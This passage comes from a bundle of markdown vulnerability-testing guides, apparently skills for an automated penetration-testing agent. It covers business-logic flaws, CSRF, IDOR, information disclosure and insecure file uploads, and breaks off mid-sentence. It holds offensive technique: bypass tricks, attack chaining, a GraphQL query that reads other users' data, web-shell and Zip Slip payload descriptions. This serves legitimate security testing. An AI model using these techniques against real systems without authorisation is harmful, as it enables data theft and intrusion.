Admin-only operations with proper audit and approvals\n\n## Impact\n\n- Direct financial loss (fraud, arbitrage, over-refunds, unpaid consumption)\n- Regulatory/contractual violations (billing accuracy, consumer protection)\n- Denial of inventory/services to legitimate users through resource exhaustion\n- Privilege retention or unauthorized access to premium features\n\n## Pro Tips\n\n1. Start from invariants and ledgers, not UIβ€”prove conservation of value breaks\n2. Test with time and concurrency; many bugs only appear under pressure\n3. Recompute totals server-side; never accept client mathβ€”flag when you observe otherwise\n4. Treat idempotency and retries as first-class: verify key scope and persistence\n5. Probe background workers and webhooks separately; they often skip auth and rule checks\n6. Validate role/feature gates at the service that mutates state, not only at the edge\n7. Explore end-of-period edges (month-end, trial end, DST) for rounding and window issues\n8. Use minimal, auditable PoCs that demonstrate durable state change and exact loss\n9. Chain with authorization tests (IDOR/Function-level access) to magnify impact\n10. When in doubt, map the state machine; gaps appear where transitions lack server-side guards\n\n## Summary\n\nBusiness logic security is the enforcement of domain invariants under adversarial sequencing, timing, and inputs. If any step trusts the client or prior steps, expect abuse.\n" }, { "path": "strix/skills/vulnerabilities/csrf.md", "content": "---\nname: csrf\ndescription: CSRF testing covering token bypass, SameSite cookies, CORS misconfigurations, and state-changing request abuse\n---\n\n# CSRF\n\nCross-site request forgery abuses ambient authority (cookies, HTTP auth) across origins. Do not rely on CORS alone; enforce non-replayable tokens and strict origin checks for every state change.\n\n## Attack Surface\n\n**Session Types**\n- Web apps with cookie-based sessions and HTTP auth\n- JSON/REST, GraphQL (GET/persisted queries), file upload endpoints\n\n**Authentication Flows**\n- Login/logout, password/email change, MFA toggles\n\n**OAuth/OIDC**\n- Authorize, token, logout, disconnect/connect endpoints\n\n## High-Value Targets\n\n- Credentials and profile changes (email/password/phone)\n- Payment and money movement, subscription/plan changes\n- API key/secret generation, PAT rotation, SSH keys\n- 2FA/TOTP enable/disable; backup codes; device trust\n- OAuth connect/disconnect; logout; account deletion\n- Admin/staff actions and impersonation flows\n- File uploads/deletes; access control changes\n\n## Reconnaissance\n\n### Session and Cookies\n\n- Inspect cookies: HttpOnly, Secure, SameSite (Strict/Lax/None)\n- Lax allows cookies on top-level cross-site GET; None requires Secure\n- Determine if Authorization headers or bearer tokens are used (generally not CSRF-prone) versus cookies (CSRF-prone)\n\n### Token and Header Checks\n\n- Locate anti-CSRF tokens (hidden inputs, meta tags, custom headers)\n- Test removal, reuse across requests, reuse across sessions, binding to method/path\n- Verify server checks Origin and/or Referer on state changes\n- Test null/missing and cross-origin values\n\n### Method and Content-Types\n\n- Confirm whether GET, HEAD, or OPTIONS perform state changes\n- Try simple content-types to avoid preflight: `application/x-www-form-urlencoded`, `multipart/form-data`, `text/plain`\n- Probe parsers that auto-coerce `text/plain` or form-encoded bodies into JSON\n\n### CORS Profile\n\n- Identify `Access-Control-Allow-Origin` and `-Credentials`\n- Overly permissive CORS is not a CSRF fix and can turn CSRF into data exfiltration\n- Test per-endpoint CORS differences; preflight vs simple request behavior can diverge\n\n## Key Vulnerabilities\n\n### Navigation CSRF\n\n- Auto-submitting form to target origin; works when cookies are sent and no token/origin checks are enforced\n- Top-level GET navigation can trigger state if server misuses GET or links actions to GET callbacks\n\n### Simple Content-Type CSRF\n\n- `application/x-www-form-urlencoded` and `multipart/form-data` POSTs do not require preflight\n- `text/plain` form bodies can slip through validators and be parsed server-side\n\n### JSON CSRF\n\n- If server parses JSON from `text/plain` or form-encoded bodies, craft parameters to reconstruct JSON\n- Some frameworks accept JSON keys via form fields (e.g., `data[foo]=bar`) or treat duplicate keys leniently\n\n### Login/Logout CSRF\n\n- Force logout to clear CSRF tokens, then chain login CSRF to bind victim to attacker's account\n- Login CSRF: submit attacker credentials to victim's browser; later actions occur under attacker's account\n\n### OAuth/OIDC Flows\n\n- Abuse authorize/logout endpoints reachable via GET or form POST without origin checks\n- Exploit relaxed SameSite on top-level navigations\n- Open redirects or loose redirect_uri validation can chain with CSRF to force unintended authorizations\n\n### File and Action Endpoints\n\n- File upload/delete often lack token checks; forge multipart requests to modify storage\n- Admin actions exposed as simple POST links are frequently CSRFable\n\n### GraphQL CSRF\n\n- If queries/mutations are allowed via GET or persisted queries, exploit top-level navigation with encoded payloads\n- Batched operations may hide mutations within a nominally safe request\n\n### WebSocket CSRF\n\n- Browsers send cookies on WebSocket handshake\n- Enforce Origin checks server-side; without them, cross-site pages can open authenticated sockets and issue actions\n\n## Bypass Techniques\n\n### SameSite Nuance\n\n- Lax-by-default cookies are sent on top-level cross-site GET but not POST\n- Exploit GET state changes and GET-based confirmation steps\n- Legacy or nonstandard clients may ignore SameSite; validate across browsers/devices\n\n### Origin/Referer Obfuscation\n\n- Sandbox/iframes can produce null Origin; some frameworks incorrectly accept null\n- `about:blank`/`data:` URLs alter Referer\n- Ensure server requires explicit Origin/Referer match\n\n### Method Override\n\n- Backends honoring `_method` or `X-HTTP-Method-Override` may allow destructive actions through a simple POST\n\n### Token Weaknesses\n\n- Accepting missing/empty tokens\n- Tokens not tied to session, user, or path\n- Tokens reused indefinitely; tokens in GET\n- Double-submit cookie without Secure/HttpOnly, or with predictable token sources\n\n### Content-Type Switching\n\n- Switch between form, multipart, and `text/plain` to reach different code paths\n- Use duplicate keys and array shapes to confuse parsers\n\n### Header Manipulation\n\n- Strip Referer via meta refresh or navigate from `about:blank`\n- Test null Origin acceptance\n- Leverage misconfigured CORS to add custom headers that servers mistakenly treat as CSRF tokens\n\n## Special Contexts\n\n### Mobile/SPA\n\n- Deep links and embedded WebViews may auto-send cookies; trigger actions via crafted intents/links\n- SPAs that rely solely on bearer tokens are less CSRF-prone, but hybrid apps mixing cookies and APIs can still be vulnerable\n\n### Integrations\n\n- Webhooks and back-office tools sometimes expose state-changing GETs intended for staff\n- Confirm CSRF defenses there too\n\n## Chaining Attacks\n\n- CSRF + IDOR: force actions on other users' resources once references are known\n- CSRF + Clickjacking: guide user interactions to bypass UI confirmations\n- CSRF + OAuth mix-up: bind victim sessions to unintended clients\n\n## Testing Methodology\n\n1. **Inventory endpoints** - All state-changing endpoints including admin/staff\n2. **Note request details** - Method, content-type, whether reachable via simple requests\n3. **Assess session model** - Cookies with SameSite attrs, custom headers, tokens\n4. **Check defenses** - Anti-CSRF tokens and Origin/Referer enforcement\n5. **Attempt preflightless delivery** - Form POST, text/plain, multipart/form-data\n6. **Test navigation** - Top-level GET navigation\n7. **Cross-browser validation** - Behavior differs by SameSite and navigation context\n\n## Validation\n\n1. Demonstrate a cross-origin page that triggers a state change without user interaction beyond visiting\n2. Show that removing the anti-CSRF control (token/header) is accepted, or that Origin/Referer are not verified\n3. Prove behavior across at least two browsers or contexts (top-level nav vs XHR/fetch)\n4. Provide before/after state evidence for the same account\n5. If defenses exist, show the exact condition under which they are bypassed (content-type, method override, null Origin)\n\n## False Positives\n\n- Token verification present and required; Origin/Referer enforced consistently\n- No cookies sent on cross-site requests (SameSite=Strict, no HTTP auth) and no state change via simple requests\n- Only idempotent, non-sensitive operations affected\n\n## Impact\n\n- Account state changes (email/password/MFA), session hijacking via login CSRF\n- Financial operations, administrative actions\n- Durable authorization changes (role/permission flips, key rotations) and data loss\n\n## Pro Tips\n\n1. Prefer preflightless vectors (form-encoded, multipart, text/plain) and top-level GET if available\n2. Test login/logout, OAuth connect/disconnect, and account linking first\n3. Validate Origin/Referer behavior explicitly; do not assume frameworks enforce them\n4. Toggle SameSite and observe differences across navigation vs XHR\n5. For GraphQL, attempt GET queries or persisted queries that carry mutations\n6. Always try method overrides and parser differentials\n7. Combine with clickjacking when visual confirmations block CSRF\n\n## Summary\n\nCSRF is eliminated only when state changes require a secret the attacker cannot supply and the server verifies the caller's origin. Tokens and Origin checks must hold across methods, content-types, and transports.\n" }, { "path": "strix/skills/vulnerabilities/idor.md", "content": "---\nname: idor\ndescription: IDOR/BOLA testing for object-level authorization failures and cross-account data access\n---\n\n# IDOR\n\nObject-level authorization failures (BOLA/IDOR) lead to cross-account data exposure and unauthorized state changes across APIs, web, mobile, and microservices. Treat every object reference as untrusted until proven bound to the caller.\n\n## Attack Surface\n\n**Scope**\n- Horizontal access: access another subject's objects of the same type\n- Vertical access: access privileged objects/actions (admin-only, staff-only)\n- Cross-tenant access: break isolation boundaries in multi-tenant systems\n- Cross-service access: token or context accepted by the wrong service\n\n**Reference Locations**\n- Paths, query params, JSON bodies, form-data, headers, cookies\n- JWT claims, GraphQL arguments, WebSocket messages, gRPC messages\n\n**Identifier Forms**\n- Integers, UUID/ULID/CUID, Snowflake, slugs\n- Composite keys (e.g., `{orgId}:{userId}`)\n- Opaque tokens, base64/hex-encoded blobs\n\n**Relationship References**\n- parentId, ownerId, accountId, tenantId, organization, teamId, projectId, subscriptionId\n\n**Expansion/Projection Knobs**\n- `fields`, `include`, `expand`, `projection`, `with`, `select`, `populate`\n- Often bypass authorization in resolvers or serializers\n\n## High-Value Targets\n\n- Exports/backups/reporting endpoints (CSV/PDF/ZIP)\n- Messaging/mailbox/notifications, audit logs, activity feeds\n- Billing: invoices, payment methods, transactions, credits\n- Healthcare/education records, HR documents, PII/PHI/PCI\n- Admin/staff tools, impersonation/session management\n- File/object storage keys (S3/GCS signed URLs, share links)\n- Background jobs: import/export job IDs, task results\n- Multi-tenant resources: organizations, workspaces, projects\n\n## Reconnaissance\n\n**Parameter Analysis**\n- Pagination/cursors: `page[offset]`, `page[limit]`, `cursor`, `nextPageToken` (often reveal or accept cross-tenant/state)\n- Directory/list endpoints as seeders: search/list/suggest/export often leak object IDs for secondary exploitation\n\n**Enumeration Techniques**\n- Alternate types: `{\"id\":123}` vs `{\"id\":\"123\"}`, arrays vs scalars, objects vs scalars\n- Edge values: null/empty/0/-1/MAX_INT, scientific notation, overflows\n- Duplicate keys/parameter pollution: `id=1&id=2`, JSON duplicate keys `{\"id\":1,\"id\":2}` (parser precedence)\n- Case/aliasing: userId vs userid vs USER_ID; alt names like resourceId, targetId, account\n- Path traversal-like in virtual file systems: `/files/user_123/../../user_456/report.csv`\n\n**UUID/Opaque ID Sources**\n- Logs, exports, JS bundles, analytics endpoints, emails, public activity\n- Time-based IDs (UUIDv1, ULID) may be guessable within a window\n\n## Key Vulnerabilities\n\n### Horizontal & Vertical Access\n\n- Swap object IDs between principals using the same token to probe horizontal access\n- Repeat with lower-privilege tokens to probe vertical access\n- Target partial updates (PATCH, JSON Patch/JSON Merge Patch) for silent unauthorized modifications\n\n### Bulk & Batch Operations\n\n- Batch endpoints (bulk update/delete) often validate only the first element; include cross-tenant IDs mid-array\n- CSV/JSON imports referencing foreign object IDs (ownerId, orgId) may bypass create-time checks\n\n### Secondary IDOR\n\n- Use list/search endpoints, notifications, emails, webhooks, and client logs to collect valid IDs\n- Fetch or mutate those objects directly\n- Pagination/cursor manipulation to skip filters and pull other users' pages\n\n### Job/Task Objects\n\n- Access job/task IDs from one user to retrieve results for another (`export/{jobId}/download`, `reports/{taskId}`)\n- Cancel/approve someone else's jobs by referencing their task IDs\n\n### File/Object Storage\n\n- Direct object paths or weakly scoped signed URLs\n- Attempt key prefix changes, content-disposition tricks, or stale signatures reused across tenants\n- Replace share tokens with tokens from other tenants; try case/URL-encoding variations\n\n### GraphQL\n\n- Enforce resolver-level checks: do not rely on a top-level gate\n- Verify field and edge resolvers bind the resource to the caller on every hop\n- Abuse batching/aliases to retrieve multiple users' nodes in one request\n- Global node patterns (Relay): decode base64 IDs and swap raw IDs\n- Overfetching via fragments on privileged types\n\n```graphql\nquery IDOR {\n me { id }\n u1: user(id: \"VXNlcjo0NTY=\") { email billing { last4 } }\n u2: node(id: \"VXNlcjo0NTc=\") { ... on User { email } }\n}\n```\n\n### Microservices & Gateways\n\n- Token confusion: token scoped for Service A accepted by Service B due to shared JWT verification but missing audience/claims checks\n- Trust on headers: reverse proxies or API gateways injecting/trusting headers like `X-User-Id`, `X-Organization-Id`; try overriding or removing them\n- Context loss: async consumers (queues, workers) re-process requests without re-checking authorization\n\n### Multi-Tenant\n\n- Probe tenant scoping through headers, subdomains, and path params (`X-Tenant-ID`, org slug)\n- Try mixing org of token with resource from another org\n- Test cross-tenant reports/analytics rollups and admin views which aggregate multiple tenants\n\n### WebSocket\n\n- Authorization per-subscription: ensure channel/topic names cannot be guessed (`user_{id}`, `org_{id}`)\n- Subscribe/publish checks must run server-side, not only at handshake\n- Try sending messages with target user IDs after subscribing to own channels\n\n### gRPC\n\n- Direct protobuf fields (`owner_id`, `tenant_id`) often bypass HTTP-layer middleware\n- Validate references via grpcurl with tokens from different principals\n\n### Integrations\n\n- Webhooks/callbacks referencing foreign objects (e.g., `invoice_id`) processed without verifying ownership\n- Third-party importers syncing data into wrong tenant due to missing tenant binding\n\n## Bypass Techniques\n\n**Parser & Transport**\n- Content-type switching: `application/json` ↔ `application/x-www-form-urlencoded` ↔ `multipart/form-data`\n- Method tunneling: `X-HTTP-Method-Override`, `_method=PATCH`; or using GET on endpoints incorrectly accepting state changes\n- JSON duplicate keys/array injection to bypass naive validators\n\n**Parameter Pollution**\n- Duplicate parameters in query/body to influence server-side precedence (`id=123&id=456`); try both orderings\n- Mix case/alias param names so gateway and backend disagree (userId vs userid)\n\n**Cache & Gateway**\n- CDN/proxy key confusion: responses keyed without Authorization or tenant headers expose cached objects to other users\n- Manipulate Vary and Accept headers\n- Redirect chains and 304/206 behaviors can leak content across tenants\n\n**Race Windows**\n- Time-of-check vs time-of-use: change the referenced ID between validation and execution using parallel requests\n\n**Blind Channels**\n- Use differential responses (status, size, ETag, timing) to detect existence\n- Error shape often differs for owned vs foreign objects\n- HEAD/OPTIONS, conditional requests (`If-None-Match`/`If-Modified-Since`) can confirm existence without full content\n\n## Chaining Attacks\n\n- IDOR + CSRF: force victims to trigger unauthorized changes on objects you discovered\n- IDOR + Stored XSS: pivot into other users' sessions through data you gained access to\n- IDOR + SSRF: exfiltrate internal IDs, then access their corresponding resources\n- IDOR + Race: bypass spot checks with simultaneous requests\n\n## Testing Methodology\n\n1. **Build matrix** - Subject Γ— Object Γ— Action matrix (who can do what to which resource)\n2. **Obtain principals** - At least two: owner and non-owner (plus admin/staff if applicable)\n3. **Collect IDs** - Capture at least one valid object ID per principal from list/search/export endpoints\n4. **Cross-channel testing** - Exercise every action (R/W/D/Export) while swapping IDs, tokens, tenants\n5. **Transport variation** - Test across web, mobile, API, GraphQL, WebSocket, gRPC\n6. **Consistency check** - Same rule must hold regardless of transport, content-type, serialization, or gateway\n\n## Validation\n\n1. Demonstrate access to an object not owned by the caller (content or metadata)\n2. Show the same request fails with appropriately enforced authorization when corrected\n3. Prove cross-channel consistency: same unauthorized access via at least two transports (e.g., REST and GraphQL)\n4. Document tenant boundary violations (if applicable)\n5. Provide reproducible steps and evidence (requests/responses for owner vs non-owner)\n\n## False Positives\n\n- Public/anonymous resources by design\n- Soft-privatized data where content is already public\n- Idempotent metadata lookups that do not reveal sensitive content\n- Correct row-level checks enforced across all channels\n\n## Impact\n\n- Cross-account data exposure (PII/PHI/PCI)\n- Unauthorized state changes (transfers, role changes, cancellations)\n- Cross-tenant data leaks violating contractual and regulatory boundaries\n- Regulatory risk (GDPR/HIPAA/PCI), fraud, reputational damage\n\n## Pro Tips\n\n1. Always test list/search/export endpoints first; they are rich ID seeders\n2. Build a reusable ID corpus from logs, notifications, emails, and client bundles\n3. Toggle content-types and transports; authorization middleware often differs per stack\n4. In GraphQL, validate at resolver boundaries; never trust parent auth to cover children\n5. In multi-tenant apps, vary org headers, subdomains, and path params independently\n6. Check batch/bulk operations and background job endpoints; they frequently skip per-item checks\n7. Inspect gateways for header trust and cache key configuration\n8. Treat UUIDs as untrusted; obtain them via OSINT/leaks and test binding\n9. Use timing/size/ETag differentials for blind confirmation when content is masked\n10. Prove impact with precise before/after diffs and role-separated evidence\n\n## Summary\n\nAuthorization must bind subject, action, and specific object on every request, regardless of identifier opacity or transport. If the binding is missing anywhere, the system is vulnerable.\n" }, { "path": "strix/skills/vulnerabilities/information_disclosure.md", "content": "---\nname: information-disclosure\ndescription: Information disclosure testing covering error messages, debug endpoints, metadata leakage, and source exposure\n---\n\n# Information Disclosure\n\nInformation leaks accelerate exploitation by revealing code, configuration, identifiers, and trust boundaries. Treat every response byte, artifact, and header as potential intelligence. Minimize, normalize, and scope disclosure across all channels.\n\n## Attack Surface\n\n- Errors and exception pages: stack traces, file paths, SQL, framework versions\n- Debug/dev tooling reachable in prod: debuggers, profilers, feature flags\n- DVCS/build artifacts and temp/backup files: .git, .svn, .hg, .bak, .swp, archives\n- Configuration and secrets: .env, phpinfo, appsettings.json, Docker/K8s manifests\n- API schemas and introspection: OpenAPI/Swagger, GraphQL introspection, gRPC reflection\n- Client bundles and source maps: webpack/Vite maps, embedded env, `__NEXT_DATA__`, static JSON\n- Headers and response metadata: Server/X-Powered-By, tracing, ETag, Accept-Ranges, Server-Timing\n- Storage/export surfaces: public buckets, signed URLs, export/download endpoints\n- Observability/admin: /metrics, /actuator, /health, tracing UIs (Jaeger, Zipkin), Kibana, Admin UIs\n- Directory listings and indexing: autoindex, sitemap/robots revealing hidden routes\n\n## High-Value Surfaces\n\n### Errors and Exceptions\n\n- SQL/ORM errors: reveal table/column names, DBMS, query fragments\n- Stack traces: absolute paths, class/method names, framework versions, developer emails\n- Template engine probes: `{{7*7}}`, `${7*7}` identify templating stack\n- JSON/XML parsers: type mismatches leak internal model names\n\n### Debug and Env Modes\n\n- Debug pages: Django DEBUG, Laravel Telescope, Rails error pages, Flask/Werkzeug debugger, ASP.NET customErrors Off\n- Profiler endpoints: `/debug/pprof`, `/actuator`, `/_profiler`, custom `/debug` APIs\n- Feature/config toggles exposed in JS or headers\n\n### DVCS and Backups\n\n- DVCS: `/.git/` (HEAD, config, index, objects), `.svn/entries`, `.hg/store` β†’ reconstruct source and secrets\n- Backups/temp: `.bak`/`.old`/`~`/`.swp`/`.swo`/`.tmp`/`.orig`, db dumps, zipped deployments\n- Build artifacts: dist artifacts containing `.map`, env prints, internal URLs\n\n### Configs and Secrets\n\n- Classic: web.config, appsettings.json, settings.py, config.php, phpinfo.php\n- Containers/cloud: Dockerfile, docker-compose.yml, Kubernetes manifests, service account tokens\n- Credentials and connection strings; internal hosts and ports; JWT secrets\n\n### API Schemas and Introspection\n\n- OpenAPI/Swagger: `/swagger`, `/api-docs`, `/openapi.json` β€” enumerate hidden/privileged operations\n- GraphQL: introspection enabled; field suggestions; error disclosure via invalid fields\n- gRPC: server reflection exposing services/messages\n\n### Client Bundles and Maps\n\n- Source maps (`.map`) reveal original sources, comments, and internal logic\n- Client env leakage: `NEXT_PUBLIC_`/`VITE_`/`REACT_APP_` variables; embedded secrets\n- `__NEXT_DATA__` and pre-fetched JSON can include internal IDs, flags, or PII\n\n### Headers and Response Metadata\n\n- Fingerprinting: Server, X-Powered-By, X-AspNet-Version\n- Tracing: X-Request-Id, traceparent, Server-Timing, debug headers\n- Caching oracles: ETag/If-None-Match, Last-Modified/If-Modified-Since, Accept-Ranges/Range\n\n### Storage and Exports\n\n- Public object storage: S3/GCS/Azure blobs with world-readable ACLs or guessable keys\n- Signed URLs: long-lived, weakly scoped, re-usable across tenants\n- Export/report endpoints returning foreign data sets or unfiltered fields\n\n### Observability and Admin\n\n- Metrics: Prometheus `/metrics` exposing internal hostnames, process args\n- Health/config: `/actuator/health`, `/actuator/env`, Spring Boot info endpoints\n- Tracing UIs: Jaeger/Zipkin/Kibana/Grafana exposed without auth\n\n### Cross-Origin Signals\n\n- Referrer leakage: missing/weak referrer policy leading to path/query/token leaks to third parties\n- CORS: overly permissive Access-Control-Allow-Origin/Expose-Headers revealing data cross-origin; preflight error shapes\n\n### File Metadata\n\n- EXIF, PDF/Office properties: authors, paths, software versions, timestamps, embedded objects\n\n### Cloud Storage\n\n- S3/GCS/Azure: anonymous listing disabled but object reads allowed; metadata headers leak owner/project identifiers\n- Pre-signed URLs: audience not bound; observe key scope and lifetime in URL params\n\n## Key Vulnerabilities\n\n### Differential Oracles\n\n- Compare owner vs non-owner vs anonymous for the same resource\n- Track: status, length, ETag, Last-Modified, Cache-Control\n- HEAD vs GET: header-only differences can confirm existence\n- Conditional requests: 304 vs 200 behaviors leak existence/state\n\n### CDN and Cache Keys\n\n- Identity-agnostic caches: CDN/proxy keys missing Authorization/tenant headers\n- Vary misconfiguration: user-agent/language vary without auth vary leaks content\n- 206 partial content + stale caches leak object fragments\n\n### Cross-Channel Mirroring\n\n- Inconsistent hardening between REST, GraphQL, WebSocket, and gRPC\n- SSR vs CSR: server-rendered pages omit fields while JSON API includes them\n\n## Triage Rubric\n\n- **Critical**: Credentials/keys; signed URL secrets; config dumps; unrestricted admin/observability panels\n- **High**: Versions with reachable CVEs; cross-tenant data; caches serving cross-user content\n- **Medium**: Internal paths/hosts enabling LFI/SSRF pivots; source maps revealing hidden endpoints\n- **Low**: Generic headers, marketing versions, intended documentation without exploit path\n\n## Exploitation Chains\n\n### Credential Extraction\n- DVCS/config dumps exposing secrets (DB, SMTP, JWT, cloud)\n- Keys β†’ cloud control plane access\n\n### Version to CVE\n1. Derive precise component versions from headers/errors/bundles\n2. Map to known CVEs and confirm reachability\n3. Execute minimal proof targeting disclosed component\n\n### Path Disclosure to LFI\n1. Paths from stack traces/templates reveal filesystem layout\n2. Use LFI/traversal to fetch config/keys\n\n### Schema to Auth Bypass\n1. Schema reveals hidden fields/endpoints\n2. Attempt requests with those fields; confirm missing authorization\n\n## Testing Methodology\n\n1. **Build channel map** - Web, API, GraphQL, WebSocket, gRPC, mobile, background jobs, exports, CDN\n2. **Establish diff harness** - Compare owner vs non-owner vs anonymous; normalize on status/body length/ETag/headers\n3. **Trigger controlled failures** - Malformed types, boundary values, missing params, alternate content-types\n4. **Enumerate artifacts** - DVCS folders, backups, config endpoints, source maps, client bundles, API docs\n5. **Correlate to impact** - Versionsβ†’CVE, pathsβ†’LFI/RCE, keysβ†’cloud access, schemasβ†’auth bypass\n\n## Validation\n\n1. Provide raw evidence (headers/body/artifact) and explain exact data revealed\n2. Determine intent: cross-check docs/UX; classify per triage rubric\n3. Attempt minimal, reversible exploitation or present a concrete step-by-step chain\n4. Show reproducibility and minimal request set\n5. Bound scope (user, tenant, environment) and data sensitivity classification\n\n## False Positives\n\n- Intentional public docs or non-sensitive metadata with no exploit path\n- Generic errors with no actionable details\n- Redacted fields that do not change differential oracles\n- Version banners with no exposed vulnerable surface and no chain\n- Owner-visible-only details that do not cross identity/tenant boundaries\n\n## Impact\n\n- Accelerated exploitation of RCE/LFI/SSRF via precise versions and paths\n- Credential/secret exposure leading to persistent external compromise\n- Cross-tenant data disclosure through exports, caches, or mis-scoped signed URLs\n- Privacy/regulatory violations and business intelligence leakage\n\n## Pro Tips\n\n1. Start with artifacts (DVCS, backups, maps) before payloads; artifacts yield the fastest wins\n2. Normalize responses and diff by digest to reduce noise when comparing roles\n3. Hunt source maps and client data JSON; they often carry internal IDs and flags\n4. Probe caches/CDNs for identity-unaware keys; verify Vary includes Authorization/tenant\n5. Treat introspection and reflection as configuration findings across GraphQL/gRPC\n6. Mine observability endpoints last; they are noisy but high-yield in misconfigured setups\n7. Chain quickly to a concrete risk and stopβ€”proof should be minimal and reversible\n\n## Summary\n\nInformation disclosure is an amplifier. Convert leaks into precise, minimal exploits or clear architectural risks.\n" }, { "path": "strix/skills/vulnerabilities/insecure_file_uploads.md", "content": "---\nname: insecure-file-uploads\ndescription: File upload security testing covering extension bypass, content-type manipulation, and path traversal\n---\n\n# Insecure File Uploads\n\nUpload surfaces are high risk: server-side execution (RCE), stored XSS, malware distribution, storage takeover, and DoS. Modern stacks mix direct-to-cloud uploads, background processors, and CDNsβ€”authorization and validation must hold across every step.\n\n## Attack Surface\n\n- Web/mobile/API uploads, direct-to-cloud (S3/GCS/Azure) presigned flows, resumable/multipart protocols (tus, S3 MPU)\n- Image/document/media pipelines (ImageMagick/GraphicsMagick, Ghostscript, ExifTool, PDF engines, office converters)\n- Admin/bulk importers, archive uploads (zip/tar), report/template uploads, rich text with attachments\n- Serving paths: app directly, object storage, CDN, email attachments, previews/thumbnails\n\n## Reconnaissance\n\n### Surface Map\n\n- Endpoints/fields: upload, file, avatar, image, attachment, import, media, document, template\n- Direct-to-cloud params: key, bucket, acl, Content-Type, Content-Disposition, x-amz-meta-*, cache-control\n- Resumable APIs: create/init β†’ upload/chunk β†’ complete/finalize; check if metadata/headers can be altered late\n- Background processors: thumbnails, PDFβ†’image, virus scan queues; identify timing and status transitions\n\n### Capability Probes\n\n- Small probe files of each claimed type; diff resulting Content-Type, Content-Disposition, and X-Content-Type-Options on download\n- Magic bytes vs extension: JPEG/GIF/PNG headers; mismatches reveal reliance on extension or MIME sniffing\n- SVG/HTML probe: do they render inline (text/html or image/svg+xml) or download (attachment)?\n- Archive probe: simple zip with nested path traversal entries and symlinks to detect extraction rules\n\n## Detection Channels\n\n### Server Execution\n\n- Web shell execution (language dependent), config/handler uploads (.htaccess, .user.ini, web.config) enabling execution\n- Interpreter-side template/script evaluation during conversion (ImageMagick/Ghostscript/ExifTool)\n\n### Client Execution\n\n- Stored XSS via SVG/HTML/JS if served inline without correct headers; PDF JavaScript; office macros in previewers\n\n### Header and Render\n\n- Missing X-Content-Type-Options: nosniff enabling browser sniff to script\n- Content-Type reflection from upload vs server-set; Content-Disposition: inline vs attachment\n\n### Process Side Effects\n\n- AV/CDR race or absence; background job status allows access before scan completes; password-protected archives bypass scanning\n\n## Core Payloads\n\n### Web Shells and Configs\n\n- PHP: GIF polyglot (starts with GIF89a) followed by ``; place where PHP is executed\n- .htaccess to map extensions to code (AddType/AddHandler); .user.ini (auto_prepend/append_file) for PHP-FPM\n- ASP/JSP equivalents where supported; IIS web.config to enable script execution\n\n### Stored XSS\n\n- SVG with onload/onerror handlers served as image/svg+xml or text/html\n- HTML file with script when served as text/html or sniffed due to missing nosniff\n\n### MIME Magic Polyglots\n\n- Double extensions: avatar.jpg.php, report.pdf.html; mixed casing: .pHp, .PhAr\n- Magic-byte spoofing: valid JPEG header then embedded script; verify server uses content inspection, not extensions alone\n\n### Archive Attacks\n\n- Zip Slip: entries with `../../` to escape extraction dir; symlink-in-zip pointing outside target; nested zips\n- Zip bomb: extreme compression ratios to exhaust resources in processors\n\n### Toolchain Exploits\n\n- ImageMagick/GraphicsMagick legacy vectors (policy.xml may mitigate): crafted SVG/PS/EPS invoking external commands or reading files\n- Ghostscript in PDF/PS with file operators (%pipe%)\n- ExifTool metadata parsing bugs; overly large or crafted EXIF/IPTC/XMP fields\n\n### Cloud Storage Vectors\n\n- S3/GCS presigned uploads: attacker controls Content-Type/Disposition; set text/html or image/svg+xml and inline rendering\n- Public-read ACL or permissive bucket policies expose uploads broadly\n- Object key injection via user-controlled path prefixes\n- Signed URL reuse and stale URLs; serving directly from bucket without attachment + nosniff headers\n\n## Advanced Techniques\n\n### Resumable Multipart\n\n- Change metadata between init and complete (e.g., swap Content-Type/Disposition at finalize)\n- Upload benign chunks, then swap last chunk or complete with different source\n\n### Filename and Path\n\n- Unicode homoglyphs, trailing dots/spaces, device names, reserved characters to bypass validators\n- Null-byte truncation on legacy stacks; overlong paths; case-insensitive collisions overwriting existing files\n\n### Processing Races\n\n- Request file immediately after upload but before AV/CDR completes\n- Trigger heavy conversions (large images, deep PDFs) to widen race windows\n\n### Metadata Abuse\n\n- Oversized EXIF/XMP/IPTC blocks to trigger parser flaws\n- Payloads in document properties of Office/PDF rendered by previewers\n\n### Header Manipulation\n\n- Force inline rendering with Content-Type + inline Content-Disposition\n- Cache poisoning via CDN with keys missing Vary on Content-Type/Disposition\n\n## Bypass Techniques\n\n### Validation Gaps\n\n- Client-side only checks; relying on JS/MIME provided by browser\n- Trusting multipart boundary part headers blindly\n- Extension allowlists without server-side content inspection\n\n### Evasion Tricks\n\n- Double extensions, mixed case, hidden dotfiles, extra dots (file..png), long paths with allowed suffix\n- Multipart name vs filename vs path discrepancies; duplicate parameters and late parameter precedence\n\n## Special Contexts\n\n### Rich Text Editors\n\n- RTEs allow image/attachment uploads and embed links; verify sanitization and serving headers\n\n### Mobile Clients\n\n- Mobile SDKs may send nonstandard MIME or metadata; servers sometimes trust client-side transformations\n\n### Serverless and CDN\n\n- Direct-to-bucket uploads with Lambda/Workers post-processing; verify security decisions are not delegated to frontends\n- CDN caching of uploaded content; ensure correct cache keys and headers\n\n## Testing Methodology\n\n1. **Map the pipeline** - Client β†’ ingress β†’ storage β†’ processors β†’ serving. Note where validation and auth occur\n2. **Identify allowed types** - Size limits, filename rules, storage keys, and who serves the content\n3. **Collect baselines** - Capture resulting URLs and headers for legitimate uploads\n4. **Exercise bypass families** - Extension games, MIME/content-type, magic bytes, polyglots, metadata payloads, archive structure\n5. **Validate execution** - Can uploaded content execute on server or client?\n\n## Validation\n\n1. Demonstrate execution or rendering of active content: web shell reachable, or SVG/HTML executing JS when viewed\n2. Show filter bypass: upload accepted despite restrictions with evidence on retrieval\n3. Prove header weaknesses: inline rendering without nosniff or missing attachment\n4. Show race or pipeline gap: access before AV/CDR; extraction outside intended directory\n5. Provide reproducible steps: request/response for upload and subsequent access\n\n## False Positives\n\n- Upload stored but never served back; or always served as attachment with strict nosniff\n- Converters run in locked-down sandboxes with no external IO and no script engines\n- AV/CDR blocks the payload and quarantines; access before scan is impossible by design\n\n## Impact\n\n- Remote code execution on application stack or media toolchain host\n- Persistent cross-site scripting and session/token exfiltration via served uploads\n- Malware distribution via public storage/CDN; brand/reputation damage\n- Data loss or corruption via overwrite/zip slip; service degradation via zip bombs\n\n## Pro Tips\n\n1. Keep PoCs minimal: tiny SVG/HTML for XSS, a single-line PHP/ASP where relevant\n2. Always capture download response headers and final MIME; that decides browser behavior\n3. Prefer transforming risky formats to safe renderings (SVGβ†’PNG) rather than complex sanitization\n4. In presigned flows, constrain all headers and object keys 